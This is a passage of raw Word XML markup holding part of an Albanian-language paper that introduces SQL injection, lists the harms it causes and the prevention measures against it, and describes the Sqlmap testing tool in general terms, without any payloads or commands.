        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cilit arrihet n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> merren t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dh</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>na duke inkorporuar SQL query n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> aplikacionin e caktuar. Nj</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ra nga veglat p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">r detektim, testim dhe paradalim </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sht</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sqlmap, e cila do t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> disktutohet n</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="00BA4181">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> punim.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D3F41" w14:textId="77777777" w:rsidR="008B1807" w:rsidRDefault="008B1807" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65459D8E" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRDefault="000C31F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B4"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADACE99" w14:textId="4432A08A" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1299"/>
          <w:tab w:val="left" w:pos="1300"/>
        </w:tabs>
        <w:spacing w:before="300"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hyrje</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656EBE73" w14:textId="72FBAAF9" w:rsidR="0003327A" w:rsidRDefault="000C2270" w:rsidP="0003327A">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Me rritjen e sulmeve çdo dit</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e m</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shum</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t>, at</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t>her</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rritet nevoja e siguris</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> m</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lart, me ç’rast interesimi p</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t>r t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pasur m</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shum</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> njohuri ndaj k</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">saj teme </w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t>sht</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i shtuar. Gjithashtu aft</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t>sia p</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t>r t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ditur dob</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t>sit t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nj</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> produkti q</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je duke e realizuar ndihmon n</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rmisimin e tij. </w:t>
      </w:r>
      <w:r w:rsidR="0003327A" w:rsidRPr="00EF6E47">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sulmi SQL injection bëhet me insertimin e SQL query përmes futjes së të dhënave prej klientit në aplikacion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648D359D" w14:textId="77777777" w:rsidR="0003327A" w:rsidRPr="00EF6E47" w:rsidRDefault="0003327A" w:rsidP="0003327A">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF6E47">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Llojet e dëmeve që mund të shkaktohen janë: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184EC132" w14:textId="77777777" w:rsidR="0003327A" w:rsidRPr="00213158"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de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Keqpërdorimi i të dhënave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205669FE" w14:textId="77777777" w:rsidR="0003327A"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en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Humbje</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>financiare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E2CEC0C" w14:textId="77777777" w:rsidR="0003327A" w:rsidRPr="0003327A"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en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Manipulimi</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i</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të</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dhënave</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në</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bazë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>të</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dhënave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C6859BC" w14:textId="4880B0B9" w:rsidR="0003327A" w:rsidRPr="0010301E"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en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Dëmtim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>markës</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së</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biznesit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A473ED1" w14:textId="77777777" w:rsidR="0003327A"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en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Shitja</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>informatave</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dhe</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të</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dhënave</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tjera</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të</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konsumatorëve</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etj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF6E47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A419046" w14:textId="77777777" w:rsidR="0003327A"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de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010301E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Vjedhja e informacioneve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004897B0" w14:textId="2C1D262E" w:rsidR="0003327A" w:rsidRPr="00EF6E47" w:rsidRDefault="00CA4304" w:rsidP="0003327A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Arsyeja</w:t>
      </w:r>
      <w:r w:rsidR="00C350F5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> kryesore p</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r p</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rdorim t</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 xml:space="preserve"> k</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 xml:space="preserve">tij mjeti </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sht</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> realizimi i parandalimeve dhe kontrllave t</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> cilat </w:t>
      </w:r>
      <w:r w:rsidR="0003327A" w:rsidRPr="00EF6E47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>mund të organizohen duke analizuar respektivisht kontrolluar çdo parametër hyrës. Forma të ndryshme të teknikave të kontrollave me AI duke bërë ndarjen e parametrav</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0003327A" w:rsidRPr="00EF6E47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> hyrës normal dhe ato që mund të jenë të dëmshme. Parametra hyërs të mos lejojn</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidR="0003327A" w:rsidRPr="00EF6E47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> hyrje të simboleve që përdoren në query dhe të kenë gjatësi të caktuar</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>. Gjithashtu validimi i të dhënave dhe filtrimi i tyre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEFEEA2" w14:textId="77777777" w:rsidR="0003327A" w:rsidRDefault="0003327A" w:rsidP="00067511">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202122"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA2C9CB" w14:textId="77777777" w:rsidR="0003327A" w:rsidRDefault="0003327A" w:rsidP="00067511">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sqlmap është njëra nga mjetet open source të njohura për testime automatike në procesin e zbulimit dhe shfrytëzimit të dobësive apo defekteve që mund të ketë apo shkaktohen nga të ashtuquajtuara injektime SQL tek ndonjë </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bazë e të dhënave</w:t>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> apo një sistemi relativ të menaxhimit të bazës së të dhënave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, atëherë është përzgjedhur ky mjet. Sqlmap ka një numër të madh të </w:t>
      </w:r>
      <w:r>
        <w:t>ç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">elësave për </w:t>
      </w:r>
      <w:r>
        <w:t>ç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>asje në marrjen e të dhënave nga baza e të dhënave</w:t>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nga baza të ndryshme të të dhënave e deri te hyrja në sisteme dhe ekzekutim të komandave në një sistem operativ.Automatizimi është një nga cilësit më të mira të kësaj vegle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06244C3D" w14:textId="77777777" w:rsidR="0003327A" w:rsidRDefault="0003327A" w:rsidP="00067511">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sqlmap është i zhvilluar në gjuhën programuese Python, që e bënë këtë vegël të pavarur nga sistemi operativ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8EA52D" w14:textId="398D6B52" w:rsidR="002E53ED" w:rsidRDefault="002E53ED" w:rsidP="0003327A">
      <w:pPr>
        <w:sectPr w:rsidR="002E53ED">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1380" w:right="1320" w:bottom="920" w:left="1220" w:header="727" w:footer="739" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48224CCC" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E8FFDB" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AC54EB" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
